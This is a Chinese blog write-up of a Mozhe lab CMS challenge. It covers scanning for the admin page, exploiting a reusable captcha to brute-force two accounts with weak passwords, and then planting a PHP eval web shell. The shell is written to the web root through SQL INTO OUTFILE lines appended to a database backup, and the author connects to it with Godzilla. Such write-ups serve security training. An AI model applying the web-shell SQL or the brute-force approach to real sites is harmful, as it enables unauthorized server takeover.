CMS系统漏洞分析溯源(第6题)

CMS系统漏洞分析溯源(第6题)

靶场为mozhe中的靶场

访问靶场地址
博客页面找到2个用户名

mozhe666
mozhe777

在这里插入图片描述
目录扫描工具扫到后台

在这里插入图片描述
后台是个带验证码的页面

在这里插入图片描述
这个靶场忘记密码这个功能是不存在,登陆输入框尝试sql注入失败

多次重发同一个包,发现一直提示密码错误,请重新输入。并没有提示验证码错误,说明存在验证码可以共用的漏洞。尝试弱口令爆破上面2个用户

先爆破出mozhe666,密码admin888

在这里插入图片描述
登录后台,写文章的功能试了试好像写不了马

在这里插入图片描述
爆破mozhe777,同样也是弱口令qwer1234

在这里插入图片描述
登录后台,这个功能是真的多应该是管理员

在这里插入图片描述
首先发现了一个上传功能,想传马尝试下没能绕过

在这里插入图片描述
又发现了一个数据库功能,想利用sql语句into outfile直接传马

在这里插入图片描述
先备份数据库导出sql文件,在最后加入

Drop TABLE IF EXISTS tpashell;
Create Table tpashell(`cmd` longtext NOT NULL);
Insert INTO tpashell VALUES('<?php @eval($_POST[tpa]);?>');
Select cmd from tpashell into outfile '/var/www/html/shell.php';
Drop TABLE IF EXISTS tpashell;

在这里插入图片描述
重新导入本地备份

在这里插入图片描述
更新缓存

在这里插入图片描述
哥斯拉连下,拿下flag

在这里插入图片描述

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值